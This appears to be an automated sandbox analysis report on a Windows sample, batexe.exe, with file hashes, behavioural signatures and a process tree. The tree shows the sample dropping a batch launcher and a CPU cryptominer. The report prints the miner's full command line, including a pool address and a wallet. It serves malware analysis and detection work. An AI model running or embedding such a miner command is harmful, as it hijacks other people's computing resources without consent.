Analysis
Max time kernel: 293s
Max time network: 298s
Platform: windows10-2004_x64
Resource: win10v2004-20231215-ja
Resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system, windows
Submitted: 18/02/2024, 01:48
Behavioral task: behavioral1
Sample: batexe.exe
Resource: win10-20240214-ja

Behavioral task: behavioral2
Sample: batexe.exe
Resource: win10v2004-20231215-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation (process: batexe.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation (process: b2e.exe)
- Executes dropped EXE (2 IoCs)
  PID 216: b2e.exe
  PID 2712: cpuminer-sse2.exe
- Loads dropped DLL (5 IoCs)
  PID 2712: cpuminer-sse2.exe (5 occurrences)
- yara_rule: upx
  Resource: behavioral2/memory/868-7-0x0000000000400000-0x000000000393A000-memory.dmp
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (8 IoCs)
  PID 868 (batexe.exe) wrote to memory of PID 216 (procid_target 85), 3 occurrences
  PID 216 (b2e.exe) wrote to memory of PID 4300 (procid_target 86), 3 occurrences
  PID 4300 (cmd.exe) wrote to memory of PID 2712 (procid_target 89), 2 occurrences
Processes
1. C:\Users\Admin\AppData\Local\Temp\batexe.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
   PID: 868
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\6AA1.tmp\b2e.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\6AA1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6AA1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      PID: 216
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D02.tmp\batchfile.bat" "
         PID: 4300
         - Suspicious use of WriteProcessMemory
         4. C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
            PID: 2712
            - Executes dropped EXE
            - Loads dropped DLL
Network
MITRE ATT&CK Enterprise v15
Downloads